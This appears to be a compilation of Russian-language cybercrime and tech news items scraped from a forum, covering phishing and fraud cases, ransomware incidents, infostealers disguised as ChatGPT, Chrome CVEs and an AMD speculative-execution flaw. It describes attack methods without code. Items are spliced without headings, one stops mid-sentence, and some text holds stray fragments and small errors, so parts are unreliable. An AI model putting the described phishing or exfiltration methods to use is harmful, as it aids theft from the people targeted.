Структурное подразделение этой сети в Луцке, насчитывавшее около 200 человек, выполняло функции службы поддержки, технического сопровождения, маркетинга и рекламы.
Для общения с клиентами использовалось российское программное обеспечение, а для вывода средств - запрещенные российские платежные системы.
Правоохранители изъяли более 100 компьютеров, другую оргтехнику, электронные документы относительно финансовых операций, выплат вознаграждения клиентам, инструкции работы с иностранцами и «черную бухгалтерию».
В кенийской столице Найроби под горячую руку правосудия попался адвокат Брайн Мвенда Ньяги. Юрист вел свои дела, участвовал в судебных заседаниях Высокого суда и апелляционного суда. За годы юридической практики он заслужил имидж успешного профессионального адвоката. Никто не сомневался в компетентности этого человека. Его профессиональная статистика говорила сама за себя: 26 дел из 26 он выиграл.
Но то ли конкурентам не пришелся по нраву успех Мвенда, то ли адвокат отстоял не того человека в суде, как Общество юристов Кении возбудило проверку в отношении его. Результат удивил всех. Оказалось, что Мвенда не имеет диплома юриста, а также лицензии, которая позволила бы ему вести юридическую практику в Кении. При этом он также не состоит в Обществе кенийских юристов.
Для задержания афериста была вызвана группа быстрого реагирования (RAT), которая и задержала Мвенду. Некоторое время он находится в штаб-квартире подразделения в ожидании дальнейшего расследования, но затем был отпущен. Это послужило поводом для новых обвинений со стороны адвокатского сообщества в том, что Мвенда сбежал и теперь скрывается. Но это опроверг кенийский политик, бывший губернатор Найроби Майк Сонко. Он выступил в поддержку задержанного адвоката и заявил, что верит в его невиновность, а также пообещал организовать для его защиты команду адвокатов.
Председатель Общества юристов Кении Эрик Теури в свою очередь опроверг заявления, что Мвенда выиграл 26 дел. Он призвал общественность не относиться к задержанному как герою, поскольку этот прецедент опасен.
- Утверждения, что Брайан Мвенда, прятавшийся под маской адвоката, выиграл 26 дел, являются ложными и вводящими в заблуждение. Никаких фактических оснований для этого нет, - написал на своей странице в соцсети Х Теури. - Мы надеемся, что он будет привлечен к ответственности.
Другие адвокаты обнаружили в документах, которые Мвенда подавал в высшие инстанции, нестыковки и ошибки. И также удивились, как этот человек мог быть настолько успешным юристом.
Сейчас общество в Кении разделилось на сторонников и противником псевдоадвоката. Часть называет его героем, отмечая, что он смог выявить недостатки системы правосудия.
Новые поправки расширяют возможности правоохранительных органов для онлайн- мониторинга.
Правоохранительные органы России могут получить расширенные права доступа к информации в режиме реального времени в рамках оперативно-розыскных мероприятий (ОРМ), согласно поправкам к Федеральному закону от 1995 года «Об оперативно-розыскной деятельности» (ОРД), предложенным Министерством внутренних дел и опубликованным 14 августа на официальном портале правовых актов.
Согласно поправкам, силовые структуры, такие как МВД и ФСБ, получат новую возможность исследовать "информацию, содержащуюся в технологических системах ее передачи", включая интернет.
В пояснительной записке сказано, что данные, в том числе текстовые сообщения, в рамках ОРД можно будет получать с серверов в дата-центрах, из облачных хранилищ и других электронных носителей. То есть речь идет об удаленном доступе к информации.
Изменения обосновываются тем, что в России широкое распространение получили интернет-преступления, например, с использованием частных сетей (VPN). По данным МВД, более 522 тысяч случаев таких преступлений были выявлены в 2022 году, что составляет 22% от общего числа преступлений.
Предыдущие поправки к закону, принятые в июне 2021 года, позволили правоохранителям запрашивать данные о геолокации абонентов. По заявлениям депутатов, эти изменения были внесены с целью облегчения поиска пропавших людей.
Сейчас для получения доступа к текстовым сообщениям граждан, защищенным тайной переписки, МВД требуется судебное решение. Новые изменения упростят эту процедуру и сократят сроки, но разрешение суда все равно останется необходимым, хоть и постфактум.
Источниками информации для оперативно-розыскных мероприятий могут стать физические устройства граждан, данные операторов связи, провайдеров и IT- компаний, говорят эксперты на рынке. Также они отмечают, что «под действие проекта подпадает и трафик: история выхода в сеть, передаваемые через мессенджеры данные, работа с внешними облачными сервисами и т. д.». Кроме того, новые поправки позволят устранить правовую коллизию, связанные с хранением данных российских граждан за пределами страны.
Крупные операторы связи отказались комментировать ситуацию. Правоохранительные органы утверждают, что главная цель поправок — официально «включить интернет и другие средства связи в перечень того, что можно исследовать в рамках ОРД». Однако эксперты и юристы выражают опасения относительно возможных злоупотреблений со стороны правоохранительных органов.
Разработчики открытого мессенджера Signal раскрыли сведения о целевой атаке, направленной на получение контроля над учётными записями некоторых пользователей. Атака проведена через взлом сервиса Twilio, используемого в Signal для организации отправки SMS-сообщений с кодами подтверждения. Анализ данных показал, что взлом Twilio мог затронуть около 1900 номеров телефонов пользователей Signal, для которых атакующие имели возможность перерегистировать номера телефонов на другое устройство, после чего получать или отправлять сообщения для привязанного номера телефона (доступ к истории прошлой переписки, информации из профиля и адресной книге не мог быть получен, так как подобная информация хранится на устройстве пользователя и не передаётся на серверы Signal).
В промежуток времени с момента взлома до блокировки сервисом Twilio скомпрометированной учётной записи сотрудника, использованной для атаки, по отмеченным 1900 номерам телефонов наблюдалась активность, связанная с регистрацией учётной записи или отправкой проверочного кода через SMS. При этом получив доступ к служебному интерфейсу Twilio атакующие интересовались конкретными тремя номерами пользователей Signal, и как минимум один из телефонов удалось привязать к устройству злоумышленников, судя по жалобе, полученной от владельца пострадавшей учётной записи. Signal отправил SMS- уведомления об инциденте всем пользователям, которых потенциально могла коснуться атака, и отменил регистрацию их устройств.
Взлом Twilio был совершён с использованием методов социальной инженерии, позволившим атакующим заманить одного из сотрудников компании на фишинговую страницу и получить доступ к его учётной записи в системе поддержки клиентов. В частности, атакующие разослали сотрудникам Twilio SMS-сообщения с предупреждением об истечении времени действия учётной записи или информацией об изменении расписания, к которым была прикреплена ссылка на поддельную страницу, стилизованную под интерфейс единого входа в служебные сервисы Twilio. По данным Twilio, подключившись к интерфейсу службы поддержки, атакующие успели получить доступ к данным, связанным со 125 пользователями.
Браузер Google Chrome теперь будет предлагать пользователю возможность использовать номер виртуальной кредитной карты в формах онлайн-платежей в Интернете. Виртуальная карта позволит сохранить в безопасности реальный номер кредитной карты при онлайн-покупках и в случае взлома систем продавца. Несколько эмитентов кредитных карт уже предлагают свои виртуальные номера, но такая услуга пока не имеет большого распространения.
По сообщениям Google, виртуальные карты появятся в продаже в США летом 2022 года. Функция будет запущена в партнерстве с компанией Capital One и другими крупными сетями и будет поддерживать платежные системы Visa и American Express, поддержка MasterCard появится позже в этом году. Наличие поддержки со стороны крупных сетей имеет большое значение, так как было бы сложно привлечь к участию каждого отдельного эмитента карт. Новая опция сначала будет доступна в Chrome на настольных компьютерах и Android, а поддержка iOS появится позже.
«Это важный шаг в обеспечении безопасности виртуальных карт как можно большему числу потребителей», - сказал вице-президент и генеральный менеджер Google по платежам Арнольд Голдберг.
«Покупатели, использующие Chrome на настольных компьютерах и Android, могут наслаждаться быстрым оформлением заказа при совершении покупок онлайн, сохраняя при этом спокойствие, зная, что их платежная информация защищена», - добавил Голдберг.
Новая функция автозаполнения введет данные виртуальной карты, включая CVV. Пользователь сможет управлять виртуальными картами и просматривать свои транзакции на pay.google.com . Несмотря на то, что виртуальные карты будут использоваться для одноразовых покупок, покупатель также сможет использовать эти карты и для подписок.
Возможно, некоторые пользователи будут беспокоиться об использовании Google покупательских привычек для таргетинга рекламы, но корпорация заявила, что не будет использовать данные о покупках в целях рекламы.
• Source: <https://support.google.com/chrome/answer/11234179?hl=en- GB;answer=95647;ref_topic=7439637>
+
Пользователей Chrome 101 порадовали новым обновлением.
Google объявила о выпуске обновления для браузера Chrome, которое устраняют в общей сложности 13 уязвимостей. Семь из них представляют собой ошибки использования после освобождения - эти типы уязвимостей могут привести к выполнению произвольного кода.
По оценке серьезности и согласно выплаченным вознаграждениям в рамках bugbounty, наиболее значимой багой является CVE-2022-1633 с высокой степенью серьезности, которая затрагивает Sharesheet.
Об ошибке сообщил Халил Жани, за что получил 5000 долларов США. Он же обнаружил другую CVE-2022-1634 высокой степени серьезности, связанную с использованием после освобождения в пользовательском интерфейсе браузера, за что ему было начислено еще 3000 долларов.
Исправлена CVE-2022-1635 с высокой степенью серьезности, также обусловленная использованием серьезности после освобождения в запросах на разрешение, о которой сообщил анонимный исследователь, получивший вознаграждение в размере 3000 долларов США.
Бесплатно поработал исследователь Сет Бренит из Microsoft, который обнаружил не менее серьезную CVE-2022-1636 (использование после освобождения) в API производительности, что согласно политике Google находится вне рамок корпоративной программы bugbounty. Обнаружил и на том, спасибо.
В вышедшей бюллетене Google сообщает о еще 4 уязвимостях высокой степени серьезности, исправленных текущим обновлением, за которые оплата будет начислена позже. К ним относятся CVE-2022-1637 (недопустимая реализация в веб- контенте), CVE-2022-1638 (переполнение буфера кучи при интернационализации V8), CVE-2022-1639 (использование после освобождения в ANGLE) и CVE-2022-1640 (использование после освобождения в Sharing).
Девятая уязвимость, устраненная с помощью обновления браузера, и седьмая уязвимость, связанная с использованием после освобождения, имеют среднюю степень серьезности. Google не упоминает об использовании каких-либо из уязвимостей в дикой природе, но как говорится еще не вечер.
Обновление Chrome 01.0.4951.64 доступно для пользователей Windows, Mac и Linux, чем и предлагаем воспользоваться.
• Source: <https://chromereleases.googleblog.com/2022/05/stable-channel- update-for-desktop_10.html?m=1>
Образовательный сервис FinalSite подвергся массированной атаке хакеров
Около 5000 школ и колледжей по всему миру столкнулись с проблемами, связанными с работой их официальных сайтов и приложений. В некоторых странах это самым негативным образом повлияло на систему образования и дистанционного обучения. Причиной сбоя стала массовая атака вымогателей, нацеленная на сервис Finalsite, предоставляющий услуги коммуникаций и веб-хостинга.
Атака с использованием программ-вымогателей — это когда хакеры с помощью специальных алгоритмов и вредоносного ПО успешно проникают в локальную сеть организации или отдельного частного лица, нарушая целостность и работоспособность систем и компьютеров. После этого, как правило, со стороны «цифровых» мошенников следует требование оплаты за восстановление системы.
В этой статье мы разберем, что же на самом деле произошло и чем это грозит обычным пользователям.
Технологический стартап FinalSite — это одно из лучших на сегодняшний день решений по автоматизации и цифровизации образовательных процессов. Данный сервис представляет собой маркетинговую и коммуникационную платформу, созданную специально для нужд частных и государственных школ по всему миру.
Тысячи учебных заведений в более чем 80 странах сегодня используют CMS Finalsite Composer и все предоставляемые ей преимущества – инновационные коммуникационные модули для связи участников образовательного процесса, электронной почты, всевозможных календарей и планировщиков, новостных лент, ведения блогов и многого другого.
Благодаря большому количеству функций, гибким возможностям интеграции различных приложений, а также единому рабочему пространству, платформа Finalsite позволяет образовательным компаниям и учреждениям объединять инструменты и сервисы для оптимизации и автоматизации педагогического процесса.
Сервис получил широкое распространение в Европе и США, однако в странах СНГ на данный момент развит плохо.
Больше всего атака хакеров повлияла на образовательную систему стран Северной Америки. В одних только США инцидент затронул порядка 3000 государственных общеобразовательных (K-12) учреждений!
Нужно понимать, что в наше время технологического прогресса и глобальной цифровизации нет ничего необычного в том, что современные школы и колледжи сотрудничают с десятками поставщиков технологических решений и стартапов, которые помогают руководству учебных учреждений практически во всем — от контроля расписания школьных звонков до запуска удобных приложений, к примеру, обучающих детей математическим понятиям или азам компьютерного пользования.
Многие считают, что произошедшее событие является чем-то большим, чем просто проблема кибербезопасности государственных учреждений. Есть мнение о том, что атака должна стать «звоночком» для того, чтобы образовательные округа должны начать думать не только о своих собственных (локальных) системах безопасности данных, но и о технологиях безопасности, используемых образовательными компаниями и подрядными организациями, с которыми они работают.
Немного цифр: Ресурсный центр кибербезопасности K-12 (исследовательская организация, очень уважаемая в США) обнаружил 408 публично раскрытых кибератак против школ или учебных учреждений программы K-12 в 2020 году, что на 18 процентов больше, чем в предшествующем году. Компания все еще собирает данные на 2021 год, но по предварительным прогнозам статистика еще более впечатляющая.
Ответить на данный вопрос сейчас достаточно сложно, однако существует две точки зрения:
Люди, связанные с разработкой антивирусного программного обеспечения и противодействием хакерам, настроены не так оптимистично, как представители платформы FinalSite.
По их мнению, атака может привести к долгосрочным проблемам, связанным с безопасностью и нормальным функционированием не только системы образования, но всего государственного аппарата в целом. Причем коснуться это может не только США, но и множество других стран, где интеграция похожих сервисов только началась или уже идет полным ходом.
Часть независимых экспертов признает необходимость разработки комплексного решения, способного нейтрализовать подобные атаки, а также минимизировать ущерб от них. Кроме того, специалисты в области онлайн-безопасности советуют пользователям всегда защищать свой IP-адрес с помощью WireGuard VPN – надежного протокола виртуального доступа к ресурсам сети Интернет.
Но на данный момент, спустя почти неделю после атаки, владельцы образовательного сервиса утверждают, что они “ не нашли абсолютно никаких доказательств того, что личная информация и персональные данные клиентов были скомпрометированы и попали в глобальную сеть”. Данное сообщение донесла до общественности Морган Делак, пресс-секретарь Finalsite, во время брифинга для прессы, проведенного на Zoom.
Кроме того, по заявлению Делак, специалисты компании постоянно отслеживают внутренние сети сервиса и именно поэтому ущерб от атаки был минимизирован. В день хакерской атаки система кибербезопасности FinalSite заметила подозрительную активность на многих модулях. Компания предприняла “упреждающий” шаг, переведя свою платформу в автономный режим и восстановив ее снова в “чистой среде”. По утверждению представителя FinalSite именно по этой причине и случился сбой в работе сайтов и приложений образовательных учреждения — потребовалось несколько дней, чтобы снова запустить сайты школ и колледжей в нормальном режиме.
Причем заботиться о своей безопасности каждый современный пользователь Интернета должен самостоятельно, ведь кража личности – одно из самых неприятных преступлений в нашем неспокойном цифровом мире. Спасение утопающих – дело рук самих утопающих, не стоит игнорировать базовые правила поведения и безопасной работы в глобальной сети!
Следственное управление УСК по Гомельской области расследует уголовное дело по факту хищения денежных средств с банковских карточек граждан, сообщил корреспонденту БЕЛТА заместитель начальника УСК по Гомельской области Александр Гриньков.
Установлено, что в сентябре этого года держатели карт, пытаясь совершить платеж через интернет-банкинг, переходили на заранее созданный преступниками фишинговый сайт, внешне схожий с официальным сайтом ОАО "АСБ Беларусбанк". Для входа в личный кабинет вводили логин, пароль, контрольный код. Этими идентификаторами завладевали злоумышленники, получали доступ к банковским счетам потерпевших и похищали денежные средства.
"Сотрудники главного управления по противодействию киберпреступности КМ МВД и управления по противодействию киберпреступности КМ УВД Гомельского облисполкома установили причастность к преступлению гражданина Российской Федерации. Он приехал в Беларусь, чтобы осуществить противоправные действия",
По имеющимся данным, от действий злоумышленника только за одну неделю с 22 по 28 сентября этого года могли пострадать не менее 60 белорусов. В настоящее время следователи устанавливают все эпизоды противоправной деятельности мужчины, а также потерпевших от его действий.
Заместитель начальника УСК отметил: несмотря на внешнюю схожесть сайта, созданного преступниками, с официальным ресурсом ОАО "АСБ Беларусбанк", адрес поддельной страницы явно свидетельствовал, что не имеет никакого отношения к банковскому учреждению Беларуси. Сайт зарегистрирован в доменной зоне "ru - Российская Федерация". "Проявив большую внимательность и бдительность при совершении платежей, потерпевшие могли бы заметить это несоответствие", - заключил Александр Гриньков.
Украинские правоохранители совместно с американскими коллегами прекратили деятельность преступной организации, участники которой наладили деятельность двух мошеннических call-центров. Об этом в четверг, 7 октября, сообщает пресс- служба Офиса генпрокурора.
По данным следствия, граждане Украины и иностранцы организовали масштабную международную мошенническую схему. Она заключалась в деятельности специально созданных торговых платформ, которые якобы позволяли получать прибыль путем купли-продажи различных активов. С помощью программного интерфейса мошенники имитировали проведение операций и роста прибыли в сотни раз.
"Подобные call-центры функционировали в Киеве и Харькове. Их штат насчитывал более 40 человек, среди которых были граждане других стран. Всех работников тщательно подбирали, а обязательным условием принятия на работу было владение иностранными языками", - говорится в сообщении.
В прокуратуре отметили, что через специально созданные торговые платформы и колл-центры члены преступной организации выманили у граждан США 7,5 млн долларов США.
"Правоохранительными органами проведено 23 санкционированных обыски на территории Киева, Киевской и Харьковской областей, во время которых изъята компьютерная техника, флешнакопители, криптоноситель, документация, банковские карты и денежные средства", - сообщили правоохранители.
Открыто дело по фактам создания и участия в преступной организации, а также мошенничества (ч. 1 ст. 255 ч. 4 ст. 190 УК Украины).
В октябре 2023 года пропал без вести мужчина, предположительно 33-летний гражданин Кубы. Его родственник сообщил полиции, что получил странные сообщения с телефона пропавшего, где утверждалось, что тот якобы встретил женщину, собирается покинуть Испанию и намерен избавиться от своего телефона. Такие заявления показались родственнику подозрительными.
В ноябре 2023 года полиция арестовала двоих подозреваемых: женщину , которую считают партнёршей исчезнувшего, и мужчину , называемого её бывшим парнем. Уже в декабре на близлежащем кладбище были обнаружены расчленённые останки , предположительно принадлежащие пропавшему.
Как сообщила полиция , снимок, сделанный сервисом Google Street View , сыграл важную роль в раскрытии дела об убийстве в маленьком городке на севере Испании. На этом изображении заметен мужчина, который грузит большой белый пластиковый мешок в багажник своего автомобиля.
Google Street View — это приложение, позволяющее пользователям просматривать панорамные снимки улиц по всему миру , заснятые с помощью автомобилей, оснащённых камерами. Примечательно, что именно в момент, когда происходила предполагаемая перевозка тела, автомобиль Google снимал эту местность. На другом фрагменте фотографий можно различить размытый силуэт человека , везущего в машине крупный белый свёрток.
Полиция подчёркивает, что сами по себе эти изображения не стали «решающими доказательствами» , однако они помогли восстановить хронологию событий и прояснить некоторые важные детали.
Сейчас обвиняемые заключены под стражу , а следствие продолжается. По словам властей, это был первый за последние 15 лет случай, когда Google Street View зафиксировал эту часть городка Тахуэко в провинции Сория, и эти уникальные снимки оказались полезными для правоохранительных органов в ходе расследования.
Google против «слепых зон»: спутниковая связь для всех
Google Messages скоро позволит
обмениваться текстовыми сообщениями через спутниковые сети, обходя «слепые
зоны». Это даст возможность оставаться на связи даже там, где нет мобильного
покрытия и Wi-Fi.
Возможности отправки фото и видео будут ограничены, но текстовые сообщения и
обращения к экстренным службам станут доступны при любых обстоятельствах.
Скорость передачи данных через спутник будет ниже обычного.
Предополагается, что функция станет доступна для всех пользователей Android
после ежегодного обновления операционной системы. Разработчики, уже
тестирующие Android 15, сообщают, что на экранах пользователей будет
высвечиваться уведомление «Автоматически подключено к спутнику
Как сообщила прокуратура округа Гуам и Северных Марианских островов, с января 2020 года по апрель 2021 года 32-летний Жюльен Абат Уэймут (Julien Abat Weymouth) оказывал услуги по переводу наличных и криптовалют за вознаграждение. Кроме того, нарушитель призывал людей к инвестициям в криптовалюты, гарантируя им процентную прибыль от вложенных средств.
Он передавал привлеченные биткоины третьей стороне, некоему Уильяму Ичиоке (William Ichioka). Ичиока управлял инвестиционной схемой Ichioka Ventures, за что впоследствии был привлечен к уголовной ответственности в Северном округе Калифорнии. При реализации этой схемы, Уэймут перевел активы на сумму около $5,5 млн. Личную прибыль он реинвестировал в различные криптовалюты, хранил деньги на банковских счетах, а часть средств тратил на покупку транспортных средств.
Претензия прокуратуры состоит и в том, что Уэймут не зарегистрировался в Сети по борьбе с финансовыми преступлениями США (FinCEN), нарушив федеральные правила по переводу денег. В рамках соглашения о признании вины, у Уэймута было конфисковано более 200 BTC на $8 млн, 6 автомобилей и $127 000 на банковском счете. Суд приговорил нарушителя к 30 месяцам тюремного заключения, после которого последует трехлетнее освобождение под надзор.
source: justice[.]gov/usao-gu/pr/guam-cryptocurrency-broker- sentenced-30-months-federal-prison-55-million-bitcoin-scheme
Киберпреступники распространяют в Facebook* поддельные версии ChatGPT, Google Bard, Midjourney и Jasper, которые предназначены для кражи паролей, криптовалютных кошельков и другой конфиденциальной информации.
Новая вредоносная кампания, обнаруженная Check Point Research (CPR) , заключается в том, что злоумышленники создают поддельные страницы или группы популярных компаний, публикуют привлекательный контент и затем призывают пользователей переходить по ссылкам, содержащим вредоносное ПО. Многие из поддельных страниц предлагают советы, новости и улучшенные версии чат-ботов Google Bard или ChatGPT. Пользователи часто даже не подозревают, что это мошенничество.
Вредоносное ПО в этой кампании предназначено для кражи различных типов информации из всех основных браузеров, включая куки (cookie), закладки, историю просмотров и пароли. Вредоносное ПО также нацелено на криптовалютные кошельки и крадет FTP-аккаунты из Filezilla и сессии из различных соцсетей и игровых платформ.
Украденные данные объединяются в один архив и загружаются на файлообменник Gofile. Затем инфостилер отправляет сообщение в Discord с информацией о всех собранных данных вместе с ссылкой на доступ к архиву с украденными данными.
Растущий общественный интерес к решениям на основе ИИ привел к тому, что злоумышленники начали использовать этот тренд для распространения вредоносных программ. Такой всплеск хакерской активности можно отнести к расширяющимся теневым рынкам, где брокеры начального доступа (Initial Access Brokers, IAB) специализируются на приобретении и продаже доступа к скомпрометированным системам.
sabj
Hive ransomware generates 10MiB of ran-
dom data, and uses it as an master key. For each file to be encrypted,
1MiB and 1KiB of data are extracted from a specific offset of the mas-
ter key and used as a keystream. The offset used at this time is stored
in the encrypted file name of each file. Using the offset of the keystream
stored in the filename, it is possible to extract the keystream used for
encryptionClick to expand...
Неизвестные взломали IT-сети Национальных игр Китая-2021
За 12 дней до начала соревнований хакеры получили доступ к публичном серверу и базе данных SQL, принадлежащим организаторам.
Неизвестная хакерская группировка получила доступ к внутренней IT-сети Национальных игр Китая-2021.
Национальные игры Китая – мульти-спортивные соревнования, по структуре схожие с Олимпийскими играми, в которых принимают участие только китайские спортсмены. В прошлом году мероприятие проходило с 15 по 27 сентября в городе Сиань провинции Шаньси.
Как сообщает ИБ-компания Avast, за 12 дней до начала соревнований неизвестные злоумышленники получили доступ к публичном серверу и базе данных SQL, принадлежащим организаторам мероприятия, и установили web-оболочки, чтобы и впредь иметь возможность получать доступ к системам. Затем атакующие пытались перемещаться по сети, эксплуатируя уязвимости и осуществляя автоматические брутфорс-атаки.
Avast стало известно о взломе из отчета команды реагирования на инциденты, содержащем подробности атаки, обнаруженные на VirusTotal. Судя по отчету и результатам дальнейшего расследования, взлом был успешно исправлен до начала спортивного мероприятия.
Специалистам не удалось установить, какая информация была похищена, но, по их мнению, атакующие либо являются китайцами, либо очень хорошо владеют китайским языком.
Aвcтpaлийcкaя кpиптoвaлютнaя биpжa mуCrуptoWallet пoтepпeлa кpax, тaк кaк eё пoльзoвaтeли мaccoвo жaлуютcя нa пpoпaжу cpeдcтв. Пo cooбщeнию The Sуdneу Morning Herald, ликвидaтopoм бизнeca нaзнaчeнa кoмпaния, cпeциaлизиpующaяcя нa бaнкpoтcтвe, SV Partners.
Hecмoтpя нa финaнcoвыe пpoблeмы, нa caйтe биpжи плaтфopмa пo-пpeжнeму peклaмиpуeтcя кaк «пepвaя в Aвcтpaлии кpиптoбиpжa c нулeвoй кoмиccиeй», кoтopaя пoзвoляeт пoльзoвaтeлям c удoбcтвoм пoкупaть и тopгoвaть тaкими кpиптoвaлютaми, кaк биткoйн (BTC), эфиpиум (ETH) и Litecoin (LTC).
Ha caйтe утвepждaeтcя, чтo aвcтpaлийcкaя биpжa oбcлужилa oкoлo З0 000 клиeнтoв, oбмeняв кpиптoвaлюту нa cумму oкoлo 20 миллиoнoв aвcтpaлийcкиx дoллapoв ($ 14,2 млн) для пoльзoвaтeлeй из 12 cтpaн.
Paccлeдoвaниe, пpoвeдённoe aвcтpaлийcкoй гaзeтoй The Age и The Sуdneу Morning Herald в aпpeлe пpoшлoгo гoдa, пoкaзaлo, чтo мнoжecтвo пoльзoвaтeлeй cooбщaли o пpoблeмax c дocтупoм к cpeдcтвaм и иx вывoду.
Heкoтopыe клиeнты кoмпaнии зaявили, чтo иx кpиптoвaлюты пoлнocтью иcчeзли. B peзультaтe oни пoдaли мнoгoчиcлeнныe жaлoбы в финaнcoвый peгулятop cтpaны Aвcтpaлийcкую кoмиccию пo цeнным бумaгaм и инвecтициям (ASIC). Aгeнтcтвo пoдтвepдилo нaличиe пpoблeм, oднaкo пoтoм нeкoтopыe пoльзoвaтeли зaявили, чтo им удaлocь вepнуть чacть cвoиx cpeдcтв.
Teм нe мeнee, бoльшинcтвo клиeнтoв кoмпaнии пo-пpeжнeму нe имeют дocтупa к cвoим aктивaм, и тeпepь кoмпeнcaциeй иx пoтepь зaнимaeтcя внeшний упpaвляющий SV Partners.
K coжaлeнию, этo нe пepвый пeчaльный эпизoд c aвcтpaлийcкими биpжaми кpиптoвaлют. B этoм гoду мaтepинcкaя кoмпaния мecтнoй кpиптoвaлютнoй биpжи ACX Blockchain Global зaдoлжaлa cвoим кpeдитopaм oкoлo 21 млн aвcтpaлийcкиx дoллapoв ($ 14,9 млн) и пpиocтaнoвилa paбoту плaтфopмы.
• Source: [https://www.smh.com.au/business/com...er-barrage-of- complaints-20211207-p59fg4.html](https://www.smh.com.au/business/companies/troubled- exchange-mycryptowallet-bites-the-dust-after-barrage-of- complaints-20211207-p59fg4.html)
Следственный комитет завершил расследование уголовного дела против шестерых иностранцев о хищении денег через социальную сеть Вконтакте, сообщили БЕЛТА в СК.
"Главным следственным управлением СК завершено расследование уголовного дела по подозрению шестерых иностранных граждан в совершении преступлений, предусмотренных ч.2 ст.209 (завладение имуществом путем обмана и злоупотребления доверием, совершенное группой лиц), ч.4 ст.212 (хищение имущества путем модификации компьютерной информации, совершенное группой лиц в особо крупном размере), ч.1 ст.349 (несанкционированный доступ к компьютерной информации, совершенный из корыстной заинтересованности) УК", - уточнили в ведомстве.
По данным следствия, с 2017 по 2020 годы подозреваемые приобретали на нелегальной международной киберплатформе реквизиты доступа к учетным записям пользователей социальной сети ВКонтакте, а также реквизиты доступа к банковским счетам. "К слову, работа вышеуказанной киберплатформы заблокирована ФБР США в марте 2020 года", - отметили в СК.
Используя полученные реквизиты, мужчины осуществляли доступ к страницам белорусов, в том числе к личной переписке, списку контактов, фотографиям, после чего вступали в переписку с друзьями "взломанных" пользователей. В дальнейшем подозреваемые под различными предлогами выманивали у них реквизиты банковских платежных карточек и похищали с них деньги.
"Находясь под влиянием подозреваемых, ничего не подозревающие граждане, сообщали реквизиты своих банковских платежных карточек, а также логины и пароли доступа к счетам в банках, в результате чего практически мгновенно теряли денежные средства со своих счетов. Для сокрытия следов своей преступной деятельности молодые люди использовали счета в платежных сервисах, зарегистрированные на подставных лиц, а также различные технологии, которые не позволяли установить их действительное местоположение. Это позволило подозреваемым достаточно длительное время оставаться вне подозрений", - рассказали в ведомстве.
Благодаря успешному международному сотрудничеству был установлен круг лиц, причастных к совершению данной серии преступлений, получены доказательства их преступной деятельности. При участии сотрудников Национальной полиции Украины у подозреваемых по месту жительства были проведены обыски, изъяты предметы и документы, имеющие значение для уголовного дела, подозреваемые были допрошены по сути выдвинутых в отношении них подозрений.
"В ходе следствия в одном производстве соединено более 300 уголовных дел, возбужденных территориальными подразделениями СК по фактам совершения аналогичных преступлений. Материалы уголовного дела переданы в Генпрокуратуру для дальнейшей передачи в Украину с целью осуществления уголовного преследования подозреваемых на территории указанного государства. Данное уголовное дело является очередным примером того, что благодаря эффективному международному сотрудничеству правоохранительных органов большие расстояния и разные юрисдикции не могут выступать гарантией защиты от правосудия и справедливость обязательно восторжествует", - подчеркнули в СК.
• Source: [https://www.sk.gov.by/ru/news-ru/vi...-setjax-i-vymanivali-ot-ix- imeni-dengi-10264/](https://www.sk.gov.by/ru/news-ru/view/osuschestvljali- dostup-k-stranitsam-polzovatelej-v-sotsialnyx-setjax-i-vymanivali-ot-ix-imeni- dengi-10264/)
• Video:
Группа исследователей из Технического университета Дрездена выявила [уязвимость](https://www.amd.com/en/corporate/product-security/bulletin/amd- sb-1010) (CVE-2020-12965) в процессорах AMD на базе микроархитектур Zen+ и Zen 2, позволяющую совершить атаку класса Meltdown. Изначально предполагалось, что процессоры AMD Zen+ и Zen 2 не подвержены уязвимости Meltdown, но исследователями была выявлена особенность, приводящая к спекулятивному обращению к защищённым областям памяти при использовании неканонических виртуальных адресов.
Архитектура AMD64 подразумевает использование только первых 48 бит виртуального адреса и игнорирование оставшихся 16 бит. При этом определено, что биты с 48 по 63 всегда должны копировать значение 47 бита (расширение знакового бита). В случае нарушения данного условия и попытки обращения по адресу с произвольными значениями верхних битов процессор генерирует исключение. Повторяющееся заполнение верхних битов приводит к разделению доступного адресного пространства на два блока - нижний (от 0 до 00007FFFFFFFFFFF), в котором верхние биты обнулены, и верхний (от FFFF800000000000 до FFFFFFFFFFFFFFFF), в котором все верхние биты выставлены в 1.
Адреса подпадающие под указанные блоки называются каноническими, а некорректные адреса с произвольным содержимым верхних битов - неканоническими. Нижний диапазон канонических адресов, как правило, выделяется под данные процесса, а верхний используется для данных ядра (доступ к указанным адресам из пространства пользователя блокируется на уровне разделения привилегий).
Классическая уязвимость Meltdown основывается на том, что в ходе спекулятивного выполнения инструкций процессор может выполнить обращение к закрытой области данных, после чего отбросить результат так как выставленные привилегии запрещают такое обращение из процесса пользователя. В программе спекулятивно выполняемый блок отделяется от основного кода условным переходом, который в реальных условиях всегда срабатывает, но из-за того, что в условном операторе используется вычисляемое значение, которое процессор не знает во время упреждающего выполнения кода, осуществляется спекулятивное выполнение всех вариантов ветвления.
Так как для спекулятивно выполняемых операций используется тот же кэш, что и для обычно выполненных инструкций, имеется возможность в ходе спекулятивного выполнения выставить в кэше маркеры, отражающие содержимое отдельных битов в закрытой области памяти, и затем в обычно выполняемом коде определить их значение через анализ времени обращения к прокэшированным и не прокэшированным данным.
Особенность новой уязвимости, которой подвержены процессоры AMD Zen+ и Zen 2, в том, что CPU допускают спекулятивное выполнение операций чтении и записи, обращающихся к памяти с использованием недопустимых неканонических адресов, просто игнорируя верхние 16 бит. Таким образом, в процессе спекулятивного выполнения кода процессор всегда использует только нижние 48 бит, а проверка допустимости адреса производится отдельно. Если при трансляции неканонического виртуального адреса в физический адрес в буфере ассоциативной трансляции (TLB) будет выявлено совпадение канонической части адреса, то спекулятивная операция load вернёт значение без учёта содержимого верхних 16 бит, что позволяет обойти разделение памяти между потоками. В последствии операция будет признана недопустимой и отброшена, но обращение к памяти будет выполнено и данные осядут в кэше.
В ходе эксперимента при использовании техники определения содержимого кэша FLUSH+RELOAD исследователям удалось организовать канал для скрытой передачи данных со скоростью 125 байт в секунду. Для защиты от нового вида атаки могут применяться те же методы, которые помогают блокировать атаки Meltdown, такие как использование инструкций LFENCE. Кроме чипов AMD проблема также проявляется и на всех процессорах Intel, подверженных классической уязвимости Meltdown, но если процессор Intel включает аппаратную защиту от Meltdown или в системе включена программная защита, то подобные конфигурации не подвержены новому варианту атаки (если защита не включена, то смысла в использовании нового варианта атаки нет, так как можно воспользоваться более эффективным и опасным классическим Meltdown).
